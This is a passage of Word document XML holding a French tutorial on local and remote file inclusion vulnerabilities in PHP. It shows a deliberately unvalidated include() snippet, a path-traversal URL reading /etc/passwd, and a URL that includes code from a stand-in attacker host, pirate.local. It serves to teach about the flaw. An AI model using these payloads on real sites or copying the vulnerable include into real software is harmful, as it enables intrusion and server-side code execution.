          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cgu.pdf </w:t>
      </w:r>
      <w:r>
        <w:t>est donc la valeur de ce paramètre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00386E26" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE64CE6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Problème posé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120C3AA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FF03C4" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Les vulnérabilités d’inclusion de fichiers se rencontrent lorsque des applications web ne vérifient pas la validité des paramètres envoyés au serveur, c’est à dire lorsque les entrées de l’utilisateur ne sont pas filtrées ou validées. Une telle absence de validation peut permettre à un utilisateur malveillant de transmettre n’importe quelle entrée afin de provoquer l’exécution d’un fichier tiers contenant des commandes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:strike/>
        </w:rPr>
        <w:t>Ce type d’action peut entraîner une brèche de confidentialité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42404C47" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BB1630" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conséquences possibles :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EF37A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DF401A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Brèche de confidentialité ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AAE270" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBDB6FB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Vol de fichiers et codes sources ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821A248" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5BA1F5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Défiguration du site ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61333B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF748C1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Déni de service…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF0AB9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293B49BA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Le niveau de gravité dépend du code malveillant exécuté.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62883B69" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5C18FE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3786B1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C36F38B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3329DAA9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc5073_30143627171"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Inclusion de fichiers locaux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B663F4" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>L’inclusion locale fait référence à l’appel ou à l’exécution de fichiers situés localement sur le serveur web cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B256A52" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456CAE18" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755FB48B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739E32ED" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Un attaquant peut afficher la liste des utilisateurs du système visé (/etc/passwd) ou la configuration IP du serveur cible (/etc/network/interfaces).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1714A6CF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E501EA8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Prenons l’exemple d’un programme qui accepte deux catégories d’utilisateurs : les professeurs et les élèves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4C323" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAEE0B7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?PHP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFC5DD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        include($_GET["c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ategorie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F869304" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:spacing w:after="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2D13A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Dans cet exemple, il s’agit d’une requête de type GET avec utilisation d’une variable d’URL nommée categorie. L’appel peut se faire en envoyant la requête HTTP suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E17091" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A843FE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://site-inclusion.local/index.php?categorie=eleves.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour afficher la page des élèves ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://site-inclusion.local/index.php?categorie=professeurs.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour afficher la page des professeurs. On suppose que les fichiers eleves.php et professeurs.php existent dans le même répertoire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D452E88" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5216E747" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>En se basant uniquement sur les deux scénarios attendus et en l’absence de contrôles des données envoyées  au serveur, un fichier local au serveur peut être appelé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B380C2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285F76E2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>http://site-inclusion.local/index.php?categorie=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71607EDC" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="SFMono-Regular" w:hAnsi="SFMono-Regular"/>
          <w:color w:val="EB5757"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEFB80F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec PHP, l'utilisation de fonctions telles que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>require_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> peuvent contribuer à générer ce type de vulnérabilités. Les inclusions sont possibles avec d’autres langages de programmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074CDED" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0CB298" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="__RefHeading___Toc5073_301436271711"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Inclusion de fichiers distants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C6595" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ans ce cas, les fichiers appelés ou exécutés sont situés en dehors du serveur cible, par exemple sur le serveur web du pirate qui peut alors chercher à exécuter un code malveillant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841E26A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2297DBD2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Comme pour les inclusions locales, les inclusions distantes sont liées à l’absence de contrôle des données envoyées au serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D8BC90" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C6BFC6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7D223" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2905864C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un attaquant héberge un fichier sur son serveur. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://pirate.local/fichier-malveillant.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FDD592" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF71236" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRPr="0011432D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011432D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L’URL deviendra :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60828917" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRPr="0011432D" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD231A4" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:tgtFrame="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt">
        <w:r w:rsidRPr="0011432D">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:cs="Liberation Mono"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0011432D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>site-inclusion.local</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt">
        <w:r w:rsidRPr="0011432D">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:cs="Liberation Mono"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/index.php?</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId14" w:tgtFrame="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:cs="Liberation Mono"/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>categorie</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId15" w:tgtFrame="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:cs="Liberation Mono"/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>=h</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId16" w:tgtFrame="http://site-inclusion.local/index.php?lang=http://pirate.local/fichier-malveillant.txt">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:cs="Liberation Mono"/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>ttp://pirate.local/fichier-malveillant.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CC724D7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDD11CA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">En l’absence de contrôle sur la valeur du paramètre categorie, le lien malveillant sera exploité, en l’état, par la fonction php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>. Le code malveillant sera alors exécuté au moment de l’appel de la page rendant possible l’exécution d’un script sur le serveur web cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42004960" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200BBD4C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D69C2C7" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
